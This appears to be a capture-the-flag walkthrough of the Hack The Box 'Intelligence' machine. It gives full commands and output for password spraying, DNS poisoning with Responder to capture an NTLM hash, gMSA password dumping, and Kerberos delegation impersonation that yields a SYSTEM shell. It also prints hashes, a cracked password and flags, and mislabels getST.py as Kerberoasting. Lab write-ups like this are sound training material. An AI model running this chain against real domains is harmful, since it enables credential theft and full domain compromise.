Nmap scan
kali@kali ~/HTB/intelligence/intelligence2
▶ nmap -sV -sC -oA intelligence $IP -Pn
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-02 06:43 EDT
Nmap scan report for intelligence.htb (10.10.10.248)
Host is up (0.28s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Intelligence
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-02 17:44:11Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2023-10-02T17:45:36+00:00; +7h00m06s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2023-10-02T17:45:35+00:00; +7h00m06s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2023-10-02T17:45:36+00:00; +7h00m06s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-02T17:45:35+00:00; +7h00m06s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-10-02T17:44:55
|_ start_date: N/A
|_clock-skew: mean: 7h00m05s, deviation: 0s, median: 7h00m05s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.66 seconds
kali@kali ~/HTB/intelligence/intelligence2
Check port 80 as a low hanging fruit – Potential foothold
Looking around there is a link to download document — http://10.10.10.248/documents/2020-01-01-upload.pdf
Download the document and check exif information
kali@kali ~/HTB/intelligence/intelligence2
▶ ls
2020-01-01-upload.pdf intelligence.gnmap intelligence.nmap intelligence.xml
kali@kali ~/HTB/intelligence/intelligence2
▶ exiftool 2020-01-01-upload.pdf
ExifTool Version Number : 12.65
File Name : 2020-01-01-upload.pdf
Directory : .
File Size : 27 kB
File Modification Date/Time : 2021:04:01 13:00:00-04:00
File Access Date/Time : 2023:10:02 06:52:39-04:00
File Inode Change Date/Time : 2023:10:02 06:52:39-04:00
File Permissions : -rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.5
Linearized : No
Page Count : 1
Creator : William.Lee
kali@kali ~/HTB/intelligence/intelligence2
We see there is a user called William.Lee
We enumerate the link by changing the date and we can see there is other documents such as http://10.10.10.248/documents/2020-01-02-upload.pdf
used the following script to download the files for the year
#!/bin/bash
base_url="http://10.10.10.248/documents"
year=2020
for month in $(seq -w 1 12); do
case $month in
01|03|05|07|08|10|12) days=31;;
04|06|09|11) days=30;;
02)
# For 2020, which is a leap year
days=29
;;
esac
for day in $(seq -w 1 $days); do
url="${base_url}/${year}-${month}-${day}-upload.pdf"
# Check if file exists without downloading it
if wget --spider -q $url 2>/dev/null; then
wget $url # Only download if the file exists
fi
done
done
kali@kali ~/HTB/intelligence
running the script to download all the files into a new pdf folder
kali@kali ~/HTB/intelligence
▶ cd intelligence2/pdf
kali@kali ~/HTB/intelligence/intelligence2/pdf
▶ ls
download_pdfs.sh
kali@kali ~/HTB/intelligence/intelligence2/pdf
▶ ./download_pdfs.sh
pdf folder
▶ ls
2020-01-01-upload.pdf 2020-05-20-upload.pdf 2020-09-04-upload.pdf
2020-01-02-upload.pdf 2020-05-21-upload.pdf 2020-09-05-upload.pdf
2020-01-04-upload.pdf 2020-05-24-upload.pdf 2020-09-06-upload.pdf
2020-01-10-upload.pdf 2020-05-29-upload.pdf 2020-09-11-upload.pdf
2020-01-20-upload.pdf 2020-06-02-upload.pdf 2020-09-13-upload.pdf
2020-01-22-upload.pdf 2020-06-03-upload.pdf 2020-09-16-upload.pdf
2020-01-23-upload.pdf 2020-06-04-upload.pdf 2020-09-22-upload.pdf
ching 2020-01-25-upload.pdf 2020-06-07-upload.pdf 2020-09-27-upload.pdf
2020-01-30-upload.pdf 2020-06-08-upload.pdf 2020-09-29-upload.pdf
script to extract all the "creator" field from all the pdfs and send them to a users.txt file
▶ cat exif.sh
#!/bin/bash
# Directory containing the PDF files
dir="."
# Iterate over all PDF files in the directory
for pdf in "$dir"/*.pdf; do
# Extract the 'Creator' field using exiftool
creator=$(exiftool -Creator "$pdf" | awk -F': ' '{print $2}')
if [ ! -z "$creator" ]; then # Check if the 'Creator' field is not empty
echo "$creator" >> users.txt
fi
done
▶ ./exif.sh
kali@kali ~/HTB/intelligence/intelligence2/pdf
▶ less users.txt
kali@kali ~/HTB/intelligence/intelligence2/pdf
▶ more users.txt
William.Lee
Scott.Scott
Jason.Wright
Veronica.Patel
We combine all the pdfs to a single txt file so we can search for a word like password. we use pdftotext
kali@kali ~/HTB/intelligence/intelligence2/pdf
▶ for pdf in *.pdf; do
pdftotext "$pdf" - >> combined.txt
done
kali@kali ~/HTB/intelligence/intelligence2/pdf
▶
Searching for the word password in this file and show line before and after
▶ grep -B 1 -A 1 "password" combined.txt
Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible.
kali@kali ~/HTB/intelligence/intelligence2/pdf
we get the password – NewIntelligenceCorpUser9876
we check the password against all the userss using crackmapexec
kali@kali ~/HTB/intelligence/intelligence2/pdf
▶ crackmapexec smb 10.10.10.248 -u users.txt -p NewIntelligenceCorpUser9876
SMB 10.10.10.248 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.248 445 DC [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
it gets valid login for the last login tiffany.molina
SMB 10.10.10.248 445 DC [-] intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE
SMB 10.10.10.248 445 DC [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
We check with crackmapexec if we can pawn but no luck
▶ crackmapexec winrm 10.10.10.248 -u Tiffany.Molina -p NewIntelligenceCorpUser9876
SMB 10.10.10.248 5985 DC [*] Windows 10.0 Build 17763 (name:DC) (domain:intelligence.htb)
HTTP 10.10.10.248 5985 DC [*] http://10.10.10.248:5985/wsman
WINRM 10.10.10.248 5985 DC [-] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
we check the shares
SMB 10.10.10.248 445 DC ADMIN$ Remote Admin
SMB 10.10.10.248 445 DC C$ Default share
SMB 10.10.10.248 445 DC IPC$ READ Remote IPC
SMB 10.10.10.248 445 DC IT READ
SMB 10.10.10.248 445 DC NETLOGON READ Logon server share
SMB 10.10.10.248 445 DC SYSVOL READ Logon server share
SMB 10.10.10.248 445 DC Users READ
we have access to users
connecting to the users share
▶ smbclient \\\\10.10.10.248\\users -U tiffany.molina%NewIntelligenceCorpUser9876
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sun Apr 18 21:20:26 2021
.. DR 0 Sun Apr 18 21:20:26 2021
Administrator D 0 Sun Apr 18 20:18:39 2021
All Users DHSrn 0 Sat Sep 15 03:21:46 2018
Default DHR 0 Sun Apr 18 22:17:40 2021
Default User DHSrn 0 Sat Sep 15 03:21:46 2018
desktop.ini AHS 174 Sat Sep 15 03:11:27 2018
Public DR 0 Sun Apr 18 20:18:39 2021
Ted.Graves D 0 Sun Apr 18 21:20:26 2021
Tiffany.Molina D 0 Sun Apr 18 20:51:46 2021
3770367 blocks of size 4096. 1463758 blocks available
smb: \>
we are able to get the user flag
smb: \> ls
. DR 0 Sun Apr 18 21:20:26 2021
.. DR 0 Sun Apr 18 21:20:26 2021
Administrator D 0 Sun Apr 18 20:18:39 2021
All Users DHSrn 0 Sat Sep 15 03:21:46 2018
Default DHR 0 Sun Apr 18 22:17:40 2021
Default User DHSrn 0 Sat Sep 15 03:21:46 2018
desktop.ini AHS 174 Sat Sep 15 03:11:27 2018
Public DR 0 Sun Apr 18 20:18:39 2021
Ted.Graves D 0 Sun Apr 18 21:20:26 2021
Tiffany.Molina D 0 Sun Apr 18 20:51:46 2021
3770367 blocks of size 4096. 1463758 blocks available
smb: \> cd Tiffany.Mplina
cd \Tiffany.Mplina\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \> cd Tiffany.Molina
smb: \Tiffany.Molina\> ls
smb: \Tiffany.Molina\> cd Desktop
smb: \Tiffany.Molina\Desktop\> ls
. DR 0 Sun Apr 18 20:51:46 2021
.. DR 0 Sun Apr 18 20:51:46 2021
user.txt AR 34 Mon Oct 2 13:42:29 2023
c
3770367 blocks of size 4096. 1463758 blocks available
smb: \Tiffany.Molina\Desktop\> type user.txt
type: command not found
smb: \Tiffany.Molina\Desktop\> cat user.txt
cat: command not found
smb: \Tiffany.Molina\Desktop\> get user.txt
getting file \Tiffany.Molina\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \Tiffany.Molina\Desktop\>
▶ cat user.txt
9e0e4c1cdafbb30517b2ed66346a81cd
kali@kali ~/HTB/intelligence/intelligence2/pdf
▶
Tiffany also had access to the read share and we connect to it and get the .ps1 file in there
D 0 Sun Apr 18 20:50:55 2021
downdetector.ps1 A 1046 Sun Apr 18 20:50:55 2021
3770367 blocks of size 4096. 1463758 blocks available
smb: \> get downdetector.ps1
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
smb: \>
the file
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <[email protected]>' -To 'Ted Graves <[email protected]>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}
after research fond that we can use dnstool and responder to capture information
We run responder
▶ sudo python Responder.py -I tun0 -i 10.10.14.21 -A
and run dnstool
▶ python dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p NewIntelligenceCorpUser9876 -a add -r webfakedomain.intelligence.htb --data 10.10.14.21 10.10.10.248
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
kali@kali ~/HTB/intelligence/krbrelayx master
▶
We get a hash
Ted.Graves::intelligence:2291e74033392ca3:FF33E10D045B6E1A7C7C4B67B58C1384:010100000000000007043557BBF0D90172F47A5018A5B99D00000000020008005900500032004E0001001E00570049004E002D004D003500540036003600410031005000550059004700040014005900500032004E002E004C004F00430041004C0003003400570049004E002D004D0035005400360036004100310050005500590047002E005900500032004E002E004C004F00430041004C00050014005900500032004E002E004C004F00430041004C0008003000300000000000000000000000002000005C6E85BD47BB8677D646712E35A83DCDBAC1972A80DCFFA047D66D08463DAE000A001000000000000000000000000000000000000900460048005400540050002F00770065006200660061006B00650064006F006D00610069006E002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000
send this to a file called ted
its an NTLM hash
Running this against hashcat
▶ cd /usr/bin
kali@kali /usr/bin
▶ sudo ./hashcat -m 5600 /home/kali/HTB/intelligence/ted /usr/share/wordlists/rockyou.txt
we run bloodhound to get the jsons that we can load to bloodhound
▶ bloodhound-python -u TED.GRAVES -p 'Mr.Teddy' -ns 10.10.10.248 -d intelligence.htb -c all
▶ bloodhound-python -u TED.GRAVES -p 'Mr.Teddy' -ns 10.10.10.248 -d intelligence.htb -c all
INFO: Found AD domain: intelligence.htb
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 42 users
INFO: Found 54 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: svc_int.intelligence.htb
INFO: Querying computer: dc.intelligence.htb
WARNING: Could not resolve: svc_int.intelligence.htb: The resolution lifetime expired after 3.202 seconds: Server Do53:10.10.10.248@53 answered The DNS operation timed out.; Server Do53:10.10.10.248@53 answered The DNS operation timed out.
We start neo4j and load the jsons into bloodhound
Research — Ted.Graves is in the ITSupport group, which has ReadGMSAPassword
on SVC_INT. Even more interestingly, if I use the pre-built query “Shortest Path from Owned Principles”, the svc_int account has AllowedToDelegate
on the DC
There is a tool in https://github.com/micahvandeusen/gMSADumper
▶ wget https://raw.githubusercontent.com/micahvandeusen/gMSADumper/main/gMSADumper.py
--2023-10-02 08:36:04-- https://raw.githubusercontent.com/micahvandeusen/gMSADumper/main/gMSADumper.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.108.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6287 (6.1K) [text/plain]
Saving to: ‘gMSADumper.py’
gMSADumper.py 100%[===============================>] 6.14K --.-KB/s in 0.001s
2023-10-02 08:36:05 (6.33 MB/s) - ‘gMSADumper.py’ saved [6287/6287]
kali@kali ~/HTB/intelligence/intelligence2
▶
we run it with teds credentials
we get hash for svc_int account
▶ python gMSADumper.py -u Ted.Graves -p Mr.Teddy -l intelligence.htb -d intelligence.htb
Users or groups who can read password for svc_int$:
> DC$
> itsupport
svc_int$:::ff3418066942aa8bd228ea17dc71999a
svc_int$:aes256-cts-hmac-sha1-96:30844881b57965c3a115cafa00eb0935928ff0af889f3818e0bc1ccf50c0cbfb
svc_int$:aes128-cts-hmac-sha1-96:327f8f8594183dfe4f430986556147b2
kali@kali ~/HTB/intelligence/intelligence2
we use getST.py –> In the context of the OSCP (Offensive Security Certified Professional) and similar penetration testing environments, GetST.py
is a script commonly associated with the Kerberos attack vector called "Kerberoasting".
kali@kali ~/HTB/intelligence/intelligence2
▶ locate getST.py
/usr/share/doc/python3-impacket/examples/getST.py
kali@kali ~/HTB/intelligence/intelligence2
▶ cd /usr/share/doc/python3-impacket/examples/
kali@kali /usr/share/doc/python3-impacket/examples
▶ getST.py -dc-ip 10.10.10.248 -spn www/dc.intelligence.htb -hashes :ff3418066942aa8bd228ea17dc71999a -impersonate administrator intelligence.htb/svc_int
zsh: command not found: getST.py
✘ kali@kali /usr/share/doc/python3-impacket/examples
▶ ./getST.py -dc-ip 10.10.10.248 -spn www/dc.intelligence.htb -hashes :ff3418066942aa8bd228ea17dc71999a -impersonate administrator intelligence.htb/svc_int
Impacket v0.11.0 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
kali@kali /usr/share/doc/python3-impacket/examples
update NTP then retry
▶ /usr/share/doc/python3-impacket/examples/getST.py -dc-ip 10.10.10.248 -spn www/dc.intelligence.htb -hashes :ff3418066942aa8bd228ea17dc71999a -impersonate administrator intelligence.htb/svc_int
Impacket v0.11.0 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator.ccache
kali@kali ~/HTB/intelligence/intelligence2
▶ ls
2020-01-01-upload.pdf gMSADumper.py intelligence.gnmap intelligence.xml
administrator.ccache gMSADumper.py.1 intelligence.nmap pdf
kali@kali ~/HTB/intelligence/intelligence2
we export the ticket
kali@kali ~/HTB/intelligence/intelligence2
▶ export KRB5CCNAME=administrator.ccache
using psexec
/usr/share/doc/python3-impacket/examples/psexec.py -k -no-pass [email protected]@dc.intelligence.htb
▶ /usr/share/doc/python3-impacket/examples/psexec.py -k -no-pass [email protected]@dc.intelligence.htb
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on dc.intelligence.htb.....
[*] Found writable share ADMIN$
[*] Uploading file fJuQdKmn.exe
[*] Opening SVCManager on dc.intelligence.htb.....
[*] Creating service pONO on dc.intelligence.htb.....
[*] Starting service pONO.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1879]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32>
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is E3EF-EBBD
Directory of C:\Users\Administrator\Desktop
04/18/2021 05:51 PM <DIR> .
04/18/2021 05:51 PM <DIR> ..
10/02/2023 10:42 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 5,988,077,568 bytes free
C:\Users\Administrator\Desktop> type root.txt
47db65fca4342911729f61bf4b7fe6c1
C:\Users\Administrator\Desktop>